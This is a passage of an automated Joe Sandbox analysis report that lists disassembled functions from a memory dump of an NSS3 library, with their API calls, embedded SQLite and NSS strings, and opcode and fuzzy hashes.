Instruction ID: d543decbb3fa8959c7bb9ce20a43e11ed164a859a2f15fb772cfa30e39645097
Opcode Fuzzy Hash: fbe707c390461fa8e8750e2a9fc3718f720491689e6a7df7c48b534c1d326fc5
Instruction Fuzzy Hash: EB51E279A04211DFEB209E25CE49B5B77E5FF94308F18063DEC5983611E731E899CBA2

Function 6CA98F70 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6CA8DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CA98FAF
PR_Now.NSS3(?,?,00000002,?,?,?,6CA8DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CA98FD1
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CA8DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CA98FFA
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CA8DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CA99013
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CA8DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CA99042
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CA8DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CA9905A
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CA8DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CA99073
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CA8DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CA990EC

Part of subcall function 6CA60F00: PR_GetPageSize.NSS3(6CA60936,FFFFE8AE,?,6C9F16B7,00000000,?,6CA60936,00000000,?,6C9F204A), ref: 6CA60F1B
Part of subcall function 6CA60F00: PR_NewLogModule.NSS3(clock,6CA60936,FFFFE8AE,?,6C9F16B7,00000000,?,6CA60936,00000000,?,6C9F204A), ref: 6CA60F25

PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CA8DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CA99111

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
String ID:
API String ID: 2831689957-0
Opcode ID: 58f5d98dbde45a2b2a221432abf204a77c561f210ca189acdc54067ef9261e7c
Instruction ID: 80522850fc2db373f63c07ba2abb0e0150ee7f39a9566e4f4bcd11a4cc0d1e4a
Opcode Fuzzy Hash: 58f5d98dbde45a2b2a221432abf204a77c561f210ca189acdc54067ef9261e7c
Instruction Fuzzy Hash: 7E519874A046558FCF00EF38C699299BBF4BF0A318F095569DC599BB05EB31E8C8CB81

Function 6CA77CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CA740D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6CA73F7F,?,00000055,?,?,6CA71666,?,?), ref: 6CA740D9
Part of subcall function 6CA740D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6CA71666,?,?), ref: 6CA740FC
Part of subcall function 6CA740D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6CA71666,?,?), ref: 6CA74138

PR_GetCurrentThread.NSS3 ref: 6CA77CFD

Part of subcall function 6CB39BF0: TlsGetValue.KERNEL32(?,?,?,6CB80A75), ref: 6CB39C07

SECITEM_ItemsAreEqual_Util.NSS3(?,6CB99030), ref: 6CA77D1B

Part of subcall function 6CACFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6CA71A3E,00000048,00000054), ref: 6CACFD56

SECITEM_ItemsAreEqual_Util.NSS3(?,6CB99048), ref: 6CA77D2F
SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6CA77D50
PR_GetCurrentThread.NSS3 ref: 6CA77D61
PORT_ArenaMark_Util.NSS3(?), ref: 6CA77D7D
free.MOZGLUE(?), ref: 6CA77D9C
CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6CA77DB8
PR_SetError.NSS3(FFFFE023,00000000), ref: 6CA77E19

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
String ID:
API String ID: 70581797-0
Opcode ID: ebe7b964bd79b5cb71d35366fb7534b7bf548224f81f6c0e7dce1820c0614c88
Instruction ID: 4d6138227832b4ed8bcdf6a56ce7855ffea6e364256733e8943744c6c82238fa
Opcode Fuzzy Hash: ebe7b964bd79b5cb71d35366fb7534b7bf548224f81f6c0e7dce1820c0614c88
Instruction Fuzzy Hash: A541D57AA001199BDB218E699D41BAF33A8FF4535CF090124EC19E7752E730E9998AF1

Function 6CA87EB0 Relevance: 13.6, APIs: 9, Instructions: 124threadCOMMON

Download Yara Rule

APIs

free.MOZGLUE(?,00000000,00000000,?,?,?,6CA880DD), ref: 6CA87F15
DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,6CA880DD), ref: 6CA87F36
free.MOZGLUE(?,?,?,6CA880DD), ref: 6CA87F3D
SECOID_Shutdown.NSS3(00000000,00000000,?,?,?,6CA880DD), ref: 6CA87F5D
DeleteCriticalSection.KERNEL32(?,6CA880DD), ref: 6CA87F94
free.MOZGLUE(?), ref: 6CA87F9B
PR_SetError.NSS3(FFFFE08B,00000000,6CA880DD), ref: 6CA87FD0
PR_SetThreadPrivate.NSS3(FFFFFFFF,00000000,6CA880DD), ref: 6CA87FE6
free.MOZGLUE(?,6CA880DD), ref: 6CA8802D

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection$ErrorPrivateShutdownThread
String ID:
API String ID: 4037168058-0
Opcode ID: 99414e84d8751d00a0e2dd02c75251b860b72f87605130127c144576b20ff836
Instruction ID: 3db3e456af78460db2b0d446bb99c2467efb6a17c704965ba9a816ad85279b64
Opcode Fuzzy Hash: 99414e84d8751d00a0e2dd02c75251b860b72f87605130127c144576b20ff836
Instruction Fuzzy Hash: 0F41E671B421904BDB109FB9D89CA4A3BB9AB47358F154229F519C7B40DB30AC49CBA2

Function 6CACFEE0 Relevance: 13.6, APIs: 9, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CACFF00

Part of subcall function 6CB1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB1C2BF

PORT_ArenaMark_Util.NSS3(?), ref: 6CACFF18
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CACFF26
PORT_ArenaMark_Util.NSS3(?), ref: 6CACFF4F
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CACFF7A
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CACFF8C

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_Mark_$ErrorValuememset
String ID:
API String ID: 1233137751-0
Opcode ID: a6aa6774f04e1acf929fe16a70f7b39b9063da9a141ad1b407203319b391b349
Instruction ID: b402880ce99a96058b5f74f0330bf7df441150a39e0bdce1003ee215a37182ef
Opcode Fuzzy Hash: a6aa6774f04e1acf929fe16a70f7b39b9063da9a141ad1b407203319b391b349
Instruction Fuzzy Hash: 563146B2A013129BE7108E598C40B5B76A8EF56348F1A413DED18D7B40EB30E988C7D3

Function 6CAD3CA0 Relevance: 13.6, APIs: 9, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,-00000001,?,00000000,?,6CAD38BD), ref: 6CAD3CBE
PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,?,-00000001,?,00000000,?,6CAD38BD), ref: 6CAD3CD1

Part of subcall function 6CAD0BE0: malloc.MOZGLUE(6CAC8D2D,?,00000000,?), ref: 6CAD0BF8
Part of subcall function 6CAD0BE0: TlsGetValue.KERNEL32(6CAC8D2D,?,00000000,?), ref: 6CAD0C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,6CAD38BD), ref: 6CAD3CF0
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6CBAB369,000000FF,00000000,00000000,?,000000FF,00000000,00000000,6CAD38BD), ref: 6CAD3D0B
PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,6CAD38BD), ref: 6CAD3D1A
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6CBAB369,000000FF,00000000,00000000,00000000,6CAD38BD), ref: 6CAD3D38
_wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000), ref: 6CAD3D47
free.MOZGLUE(00000000), ref: 6CAD3D62
free.MOZGLUE(000000FF,?,000000FF,00000000,00000000,6CAD38BD), ref: 6CAD3D6F

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_Utilfree$Value_wfopenmalloc
String ID:
API String ID: 2345246809-0
Opcode ID: 3427faed0a83892170586fe1091dd9d8b9657e6518997aaeb2d53ee42d4a444e
Instruction ID: 2547d22b9c5323bea2385cc9c1517b361609bfa1a2fc890332b5f863198c0f91
Opcode Fuzzy Hash: 3427faed0a83892170586fe1091dd9d8b9657e6518997aaeb2d53ee42d4a444e
Instruction Fuzzy Hash: 30213BB970611237FF106A7B4C09E7B35BCDF867A5B190634B879D7AC0DA60D840C6B1

Function 6CA0E890 Relevance: 12.4, APIs: 5, Strings: 3, Instructions: 442stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6CA0E922
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CA0E9CF
memcpy.VCRUNTIME140(00000024,?,?), ref: 6CA0EA0F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA0EB20
memcpy.VCRUNTIME140(?,?,?), ref: 6CA0EB57

Strings

number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 6CA0EDC2
foreign key on %s should reference only one column of table %T, xrefs: 6CA0EE04
unknown column "%s" in foreign key definition, xrefs: 6CA0ED18

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: memcpystrlen$memset
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 638109778-272990098
Opcode ID: f265755dc7539fafa36901cb29b58d9c69ccbde2e6ec05cd4d85df9e21a93ef3
Instruction ID: 103ff55ee0e4bda9fa69a55aefa48e5fefc116f35e0d589b1c30d2ccec528a6e
Opcode Fuzzy Hash: f265755dc7539fafa36901cb29b58d9c69ccbde2e6ec05cd4d85df9e21a93ef3
Instruction Fuzzy Hash: 5A02A075F01509CFDB04CF99D480AAEB7B2FF8A348F188169D895AB751D731A881DBE0

Function 6CAD4DF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6CAD536F,00000022,?,?,00000000,?), ref: 6CAD4E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6CAD4F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6CAD4F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6CAD4FAE
free.MOZGLUE(?), ref: 6CAD4FC8

Strings

%s=%c%s%c, xrefs: 6CAD4FA9
%s=%s, xrefs: 6CAD4F89

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s
API String ID: 2709355791-2032576422
Opcode ID: 73e3de2c66cab77cbd0d176405331305c570e181d66f14535a978f8a30cde359
Instruction ID: 77ea8270eafcb33e9d3a874c6168d9f262c67e8d85d28503a7c148d96ca6ae4a
Opcode Fuzzy Hash: 73e3de2c66cab77cbd0d176405331305c570e181d66f14535a978f8a30cde359
Instruction Fuzzy Hash: 36517B31A442879BEB01CB6AC4907FF7BF59F46308F1E8125E894A7A40D735B9C58792

Function 6CA17D70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA17E27
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA17E67
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6CA17EED
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA17F2E

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA17ED8, 6CA17F08, 6CA17F19
%s at line %d of [%.10s], xrefs: 6CA17EE7, 6CA17F28
database corruption, xrefs: 6CA17EE2, 6CA17F23

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: 3f4f3f0d80b7ce1ab3efce8889d65684eedbf113fd325dd459933f60c5e7e10d
Instruction ID: fbbaa39bf8221a9374908d26df59726d9e299abe0be3db5e19d89da7eb40bcdb
Opcode Fuzzy Hash: 3f4f3f0d80b7ce1ab3efce8889d65684eedbf113fd325dd459933f60c5e7e10d
Instruction Fuzzy Hash: 9B61B174A082459FDB05CF69C890BAA37B2BF45318F1855A8EC199FB91D730EC95CBA0

Function 6CA669A0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 6C9FCA30: EnterCriticalSection.KERNEL32(?,?,?,6CA5F9C9,?,6CA5F4DA,6CA5F9C9,?,?,6CA2369A), ref: 6C9FCA7A
Part of subcall function 6C9FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C9FCB26

memset.VCRUNTIME140(00000000,00000000,?), ref: 6CA66A02
EnterCriticalSection.KERNEL32(?), ref: 6CA66AA6
LeaveCriticalSection.KERNEL32(?), ref: 6CA66AF9
sqlite3_free.NSS3(00000000), ref: 6CA66B15
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,?,0000BCCC), ref: 6CA66BA6

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 6CA66B9F
winDelete, xrefs: 6CA66B71

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memsetsqlite3_freesqlite3_log
String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
API String ID: 1816828315-1405699761
Opcode ID: 608530efbfbdf9b9442ec63e6f2b2820de951d285b458eeeb0f8451996d48ba9
Instruction ID: 31a2b168de7e10b2095f407498da040c9bc5c2cf5503552de59405a350f108c8
Opcode Fuzzy Hash: 608530efbfbdf9b9442ec63e6f2b2820de951d285b458eeeb0f8451996d48ba9
Instruction Fuzzy Hash: DF512831B41144DBEB049F76DC6AABE3779EF8A314B084128E516D7B80DB349945CBD2

Function 6C9FFCF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9FFD7A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9FFD94
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9FFE3C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9FFE83

Part of subcall function 6C9FFEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6C9FFEFA
Part of subcall function 6C9FFEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6C9FFF3B

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C9FFD64, 6C9FFE26
%s at line %d of [%.10s], xrefs: 6C9FFD73, 6C9FFE35
database corruption, xrefs: 6C9FFD6E, 6C9FFE30

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1169254434-598938438
Opcode ID: e0ea998eea27e54201e79a26d7ff9d5bb18f58dcb92aac62ef78203d009495e2
Instruction ID: a3c05b070ea61c08fc626700e31d4b7536c37536a3815c2ace6aa3193a962c41
Opcode Fuzzy Hash: e0ea998eea27e54201e79a26d7ff9d5bb18f58dcb92aac62ef78203d009495e2
Instruction Fuzzy Hash: BC518075A002059FDB04CFA9C8D0AAEB7F5FF48318F144069EA15AB752E735EC55CBA0

Function 6CB42F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB42FFD
sqlite3_initialize.NSS3 ref: 6CB43007
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CB43032
sqlite3_mprintf.NSS3(6CBAAAF9,?), ref: 6CB43073
sqlite3_free.NSS3(?), ref: 6CB430B3
sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6CB430C0

Strings

sqlite3_get_table() called with two or more incompatible queries, xrefs: 6CB430BB

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
String ID: sqlite3_get_table() called with two or more incompatible queries
API String ID: 750880481-4279182443
Opcode ID: 06dfcb5f519bbbb85c56fb40345c657fda1e8cde369d76f72c2cc33f36a18baf
Instruction ID: 1cd121beb9d829ba67488c1d33967e6daa3de098a8cb71094de9fc16f826648c
Opcode Fuzzy Hash: 06dfcb5f519bbbb85c56fb40345c657fda1e8cde369d76f72c2cc33f36a18baf
Instruction Fuzzy Hash: E941F475604646ABDB00CF25C840B4AB3B9FF54369F08C628EC1987B40E731F995DBD2

Function 6CA88CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6CA9124D,00000001), ref: 6CA88D19
EnterCriticalSection.KERNEL32(?,?,?,?,6CA9124D,00000001), ref: 6CA88D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6CA9124D,00000001), ref: 6CA88D73
PR_Unlock.NSS3(?,?,?,?,?,6CA9124D,00000001), ref: 6CA88D8C

Part of subcall function 6CB1DD70: TlsGetValue.KERNEL32 ref: 6CB1DD8C
Part of subcall function 6CB1DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB1DDB4

PR_Unlock.NSS3(?,?,?,?,?,6CA9124D,00000001), ref: 6CA88DBA

Strings

KRAM, xrefs: 6CA88D3E
KRAM, xrefs: 6CA88CF9

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: 6bf7714fac6804e0a8564e391d7d508667da508bf60e67311b2f82ee268391bb
Instruction ID: bde734edc882f1dbcb5672452a9c0ea3543632e068e812b755953577daa5b061
